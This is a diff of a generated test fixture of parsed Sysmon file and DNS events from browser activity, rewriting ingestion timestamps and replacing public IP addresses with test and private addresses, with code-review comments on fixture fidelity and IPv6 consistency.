ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\1450fedf-ac4c-4e35-b371-ed5d3bbe4776.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.028\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11244,7 +11126,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313885841Z", + "ingested": "2021-12-09T13:49:44.739646400Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e29\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\37ed32e9-3c5f-4663-8457-c70743e9456d.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:51:54.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11302,7 +11184,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313887291Z", + "ingested": "2021-12-09T13:49:44.739651900Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e30\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccab-5c8f-0000-001064eb2700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2680\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11363,7 +11245,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313888640Z", + "ingested": "2021-12-09T13:49:44.739655600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e31\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\nmmhkkegccagdldgiimedpiccmgmieda\\def\\ecb9c915-c4c2-4600-a920-f2bc302990a8.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:08.496\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11431,12 +11313,12 @@
 "type": "CNAME"
 },
 {
- "data": "23.52.162.21",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "23.52.162.21"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -11453,13 +11335,13 @@ "dsum.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313889844Z", + "ingested": "2021-12-09T13:49:44.739660300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11523,23 +11405,23 @@ "type": "CNAME" }, { - "data": "216.200.232.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "74.121.138.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { 
@@ -11547,7 +11429,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -11555,7 +11437,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -11563,22 +11445,22 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "216.200.232.235",
- "216.200.232.201",
- "74.121.138.26",
- "216.200.232.185",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30"
+ "192.168.80.30"
 ]
 },
 "network": {
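Review bot: In the `resolved_ip` hunk the four distinct A answers (`216.200.232.235`, `216.200.232.201`, `74.121.138.26`, `216.200.232.185`) all become `89.160.20.156`, so `dns.answers` and `dns.resolved_ip` now carry four identical entries and the fixture can no longer distinguish a pipeline that preserves every answer from one that deduplicates or reorders them. If the allowed test address set contains more than one public address, spread the answers over distinct ones; otherwise distinct private addresses are evidently acceptable here, as the `192.168.6.30` / `192.168.14.30` / `192.168.92.30` / `192.168.80.30` substitutions for the root-server answers in this same hunk show. Since this is a generated `-expected.json`, make the change in the `QueryResults` of the input `.log` fixture and regenerate rather than editing the expected output by hand.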
@@ -11594,23 +11476,20 @@ "sync.mathtag.com" ], "ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313891174Z", + "ingested": "2021-12-09T13:49:44.739666Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.692Z",
@@ -11678,12 +11557,12 @@
 "type": "CNAME"
 },
 {
- "data": "72.21.91.29",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "72.21.91.29"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -11700,13 +11579,13 @@ "status.rapidssl.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313892567Z", + "ingested": "2021-12-09T13:49:44.739669700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", 
@@ -11770,39 +11649,39 @@ "type": "CNAME" }, { - "data": "34.197.195.131", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.192.39.82", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.231.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.113.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.197.3.157", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.205.112.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.195.29.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.201.247.123", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11810,22 +11689,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
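Review bot: The IPv4 `A` answers in this hunk are rewritten to private `192.168.x.30` values, but the `AAAA` answers for the same query names, `2001:503:a83e::2:30` and `2001:503:231d::2:30`, are left as unchanged context on the new side and are still public addresses. If the public-IP check this change is meant to satisfy also covers IPv6, these entries (and the matching ones in the hunks ending at L15522, L15528 and L15536) would still trip it; if IPv6 is exempt from that check, saying so in the changelog entry would save the next reviewer the question. Rewriting them to an address from the same supported subset would also keep each name's A/AAAA pair consistent, which the current mix of private v4 and public v6 for one record no longer is, and the `original` XML string in the following hunk would need the identical substitution so `resolved_ip` keeps matching it. The enclosing event object starts and ends outside this hunk.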
@@ -11841,23 +11720,16 @@ "sync.extend.tv" ], "ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313893886Z", + "ingested": "2021-12-09T13:49:44.739673500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11921,11 +11793,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11933,7 +11805,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11941,7 +11813,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11949,7 +11821,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -11957,21 +11829,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
